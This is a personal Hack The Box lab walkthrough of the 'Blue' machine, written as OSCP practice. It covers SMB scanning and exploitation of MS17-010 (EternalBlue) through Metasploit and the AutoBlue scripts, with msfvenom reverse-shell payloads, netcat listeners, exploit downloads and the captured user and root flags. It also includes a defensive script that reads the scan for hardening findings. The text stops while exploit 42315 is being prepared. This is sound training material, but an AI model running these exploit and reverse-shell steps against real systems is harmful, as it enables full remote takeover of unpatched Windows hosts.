This is my attempt to create a walkthrough of HTB's Blue:

JOURNEY TO OSCP
Blue
Difficulty: Easy
Points: 20
Release: 28 Jul 2017
Windows
10.10.10.40

Autorecon:

Autorecon-445:

Looking at the ports that were scanned, ports 135 and 139 didn't turn up anything valuable to look at.

But port 445 has a lot of information and points to a possible vulnerability:

# Nmap 7.70 scan initiated Sun Apr 11 11:55:27 2021 as: nmap -vv --reason -Pn -sV -p 445 --script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer) --script-args=unsafe=1 -oN /root/Tools/AutoRecon/src/autorecon/results/10.10.10.40/scans/tcp_445_smb_nmap.txt -oX /root/Tools/AutoRecon/src/autorecon/results/10.10.10.40/scans/xml/tcp_445_smb_nmap.xml 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.13s latency).
Scanned at 2021-04-11 11:55:27 EDT for 120s

PORT    STATE SERVICE      REASON          VERSION
445/tcp open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.40\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.40\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.40\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.10.40\Share:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.10.10.40\Users:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ
| smb-ls: Volume \\10.10.10.40\Share
|   SIZE  TIME                 FILENAME
|   (two directory entries dated 2017-07-14 09:48:44; no files)
| smb-ls: Volume \\10.10.10.40\Users
|   SIZE  TIME                 FILENAME
|   Public, Public\Documents, Public\Downloads, Public\Music, Public\Pictures,
|_  Public\Recorded TV, Public\Videos (entries dated 2009-07-13 23:20 or 2011-04-12 03:51:29)
| smb-mbenum:
|   Master Browser
|     HARIS-PC  6.1
|   Potential Browser
|     HARIS-PC  6.1
|   Server service
|     HARIS-PC  6.1
|   Windows NT/2000/XP/2003 server
|     HARIS-PC  6.1
|   Workstation
|_    HARIS-PC  6.1
| smb2-capabilities:
|   2.02:
|     Distributed File System
|   2.10:
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-04-11
|_  start_date: 2021-04-11

So we see MS17-010, which is EternalBlue, listed as a likely vulnerability.

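As an added example (not part of the original walkthrough, and not AutoRecon's or Nmap's own code), here is a small Python triage script that reads the kind of Nmap normal output shown above and turns it into the hardening findings a defender would raise from this scan: a Windows host exposing SMB whose MS17-010 patch status needs confirming, SMB signing that is enabled but not required, and shares reachable anonymously. The scan text it parses is constructed to mirror this walkthrough's output rather than copied from it; the function names and the findings wording are my own.

```python
import re

# Constructed sample modelled on the Nmap output shown in this walkthrough (not a
# verbatim copy of it): the port 445 service line plus the smb-enum-shares and
# smb2-security-mode host script results.
SAMPLE_SCAN = r"""
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.13s latency).
PORT    STATE SERVICE      REASON          VERSION
445/tcp open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.40\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.10.40\Share:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|_    Current user access: READ
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""


def os_banner(text):
    """Return the VERSION field Nmap printed for 445/tcp, or None."""
    m = re.search(r"^445/tcp\s+open.*?\s(Windows\s.*?)\s+microsoft-ds\s", text, re.M)
    return m.group(1) if m else None


def signing_required(text):
    """True if SMB signing is required, False if advertised as optional or
    disabled, None if no smb(2)-security-mode result is present."""
    m = re.search(r"Message signing (enabled and required|enabled but not required|disabled)", text)
    if not m:
        return None
    return m.group(1) == "enabled and required"


def parse_shares(text):
    """Map share name -> {'anonymous': ..., 'current_user': ...} from smb-enum-shares."""
    shares = {}
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()            # drop Nmap's script-output gutter
        m = re.match(r"\\\\[\w.]+\\(\S+):$", line)  # e.g. \\10.10.10.40\Share:
        if m:
            current = m.group(1)
            shares[current] = {}
        elif current and line.startswith("Anonymous access:"):
            shares[current]["anonymous"] = line.split(":", 1)[1].strip()
        elif current and line.startswith("Current user access:"):
            shares[current]["current_user"] = line.split(":", 1)[1].strip()
    return shares


def triage(text):
    """Turn the scan into hardening findings (the wording is mine, not Nmap's)."""
    findings = []
    banner = os_banner(text)
    if banner:
        findings.append(f"{banner} exposing SMB: confirm the MS17-010 patch is installed and SMBv1 is disabled")
    if signing_required(text) is False:
        findings.append("SMB signing not required: enforce 'Digitally sign communications (always)' on the server")
    for name, access in parse_shares(text).items():
        anon = access.get("anonymous", "<none>")
        if anon != "<none>":
            findings.append(f"share {name} grants anonymous {anon} access (null session)")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCAN):
        print("-", finding)
```

Point it at AutoRecon's tcp_445_smb_nmap.txt and the same three checks apply; the share parser only looks at the Anonymous/Current user access lines, so hidden administrative shares with `<none>` on both are skipped, which is what you want when the report is meant to list exposure rather than inventory.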

Let's try Metasploit and see what happens.

Metasploit:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show optoins
Invalid parameter "optoins", use "show -h" for more information
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain                            no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.19
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

Looks like EternalBlue worked in Metasploit and it looks like we're in:

Started reverse TCP handler on 10.10.14.19:4444
10.10.10.40:445 - Connecting to target for exploitation.
10.10.10.40:445 - Connection established for exploitation.
10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
10.10.10.40:445 - CORE raw buffer dump (42 bytes)
10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
10.10.10.40:445 - Sending all but last fragment of exploit packet
10.10.10.40:445 - Starting non-paged pool grooming
10.10.10.40:445 - Sending SMBv2 buffers
10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
10.10.10.40:445 - Sending final SMBv2 buffers.
10.10.10.40:445 - Sending last fragment of exploit packet!
10.10.10.40:445 - Receiving response from exploit packet
10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
10.10.10.40:445 - Sending egg to corrupted connection.
10.10.10.40:445 - Triggering free of corrupted buffer.
Command shell session 1 opened (10.10.14.19:4444 -> 10.10.10.40:49158) at 2021-04-11 12:42:42 -0400

whoami
whoami
nt authority\system

C:\Windows\system32>

Privilege Escalation:

User Flag:

Now that we're in, I want to see if I can find the user flag:

C:\Windows\system32>cd /
cd /

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\

14/07/2009  04:20    <DIR>          PerfLogs
24/12/2017  03:23    <DIR>          Program Files
14/07/2017  17:58    <DIR>          Program Files (x86)
14/07/2017  14:48    <DIR>          Share
21/07/2017  07:56    <DIR>          Users
15/01/2021  11:42    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  bytes free

C:\Users>cd haris
cd haris

Looks like I found the user flag.

C:\Users\haris>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\haris

14/07/2017  14:45    <DIR>          .
14/07/2017  14:45    <DIR>          ..
15/07/2017  08:58    <DIR>          Contacts
24/12/2017  03:23    <DIR>          Desktop
15/07/2017  08:58    <DIR>          Documents
15/07/2017  08:58    <DIR>          Downloads
15/07/2017  08:58    <DIR>          Favorites
15/07/2017  08:58    <DIR>          Links
15/07/2017  08:58    <DIR>          Music
15/07/2017  08:58    <DIR>          Pictures
15/07/2017  08:58    <DIR>          Saved Games
15/07/2017  08:58    <DIR>          Searches
15/07/2017  08:58    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  bytes free

C:\Users\haris>cd Desktop
cd Desktop

C:\Users\haris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\haris\Desktop

24/12/2017  03:23    <DIR>          .
24/12/2017  03:23    <DIR>          ..
21/07/2017  07:54                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  bytes free

C:\Users\haris\Desktop>type user.txt
type user.txt
4c546aea7dbee75cbd71de245c8deea9

Root Flag:

Now I want to see if I can find the root flag.

Going back up a few directories, I think I saw an Administrator directory:

And yes, sure enough there is an Administrator directory:

C:\Users\haris\Desktop>cd ../
cd ../

dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\Administrator

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Contacts
24/12/2017  03:22    <DIR>          Desktop
21/07/2017  07:56    <DIR>          Documents
15/01/2021  13:05    <DIR>          Downloads
21/07/2017  07:56    <DIR>          Favorites
21/07/2017  07:56    <DIR>          Links
21/07/2017  07:56    <DIR>          Music
21/07/2017  07:56    <DIR>          Pictures
21/07/2017  07:56    <DIR>          Saved Games
21/07/2017  07:56    <DIR>          Searches
21/07/2017  07:56    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\Administrator\Desktop

24/12/2017  03:22    <DIR>          .
24/12/2017  03:22    <DIR>          ..
21/07/2017  07:57                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6c08843ce9df4e717

Exploit EternalBlue Manually:

Since I'm practicing for the OSCP, I need to learn how to exploit machines without always having Metasploit available.

I found this script:

https://github.com/3ndG4me/AutoBlue-MS17-010

Check if the target is vulnerable (assuming I didn't have AutoRecon):

python eternal_checker.py <target ip>

Create a shell:

cd shellcode
./shell_prep.sh

Start a listener:

nc -lvp 4444
nc -lvp 5555

root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# nc -lvp 4444
listening on [any] 4444 ...
root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# nc -lvp 5555
listening on [any] 5555 ...

Let's exploit. Go from /shellcode back up to /AutoBlue-MS17-010, since the exploit script is run from there with the shellcode path as its argument:

I will use eternalblue_exploit7.py:

python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin

It failed: no shell in my listener.

I'm going to try to create a new shell since this one is failing.

cd shellcode
rm sc*
ls

root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# rm sc*
root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# ls
eternalblue_kshellcode_x64.asm  eternalblue_kshellcode_x86.asm  eternalblue_sc_merge.py  shell_prep.sh
root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode#

Create the new shell:

cd shellcode
./shell_prep.sh

root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
LHOST for reverse connection:
10.10.14.19
LPORT you want x64 to listen on:
8888
LPORT you want x86 to listen on:
9999
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
Type 0 to generate a staged payload or 1 to generate a stageless payload
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8888
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=9999
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!
DONE

Start new listeners:

root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# nc -lvp 8888
listening on [any] 8888 ...
root@kali:~/Tools/10.10.10.40/AutoBlue-MS17-010/shellcode# nc -lvp 9999
listening on [any] 9999 ...

Okay, so I tried the shell twice with no result. I'm going to try to find a different exploit.

New Exploit:

Using searchsploit:

searchsploit MS17-010:

root@kali:~/Tools/10.10.10.40# searchsploit MS17-010
----------------------------------------------------------------------------------------------------------- ---------
 Exploit Title                                                                                             |  EDB-ID
----------------------------------------------------------------------------------------------------------- ---------
Microsoft Windows - 'EternalSynergy' / 'EternalChampion' SMB Remote Code Ex                                | 43970
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                              | 41891
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-0                 | 41987
Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-                 | 42031
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Ex                 | 42315
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (M                 | 42030
----------------------------------------------------------------------------------------------------------- ---------
Shellcodes: No Result

I'm working with Windows 7, so we'll use exploit #42315. Mirror the exploit into the working directory:

searchsploit -m 42315
After looking at the source code, I need to do three things:

  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.
  2. Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload.

First, download the file and rename it to mysmb.py (wget saves it as 42315.py.1 because the mirrored exploit already has that name):

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py

mv 42315.py.1 mysmb.py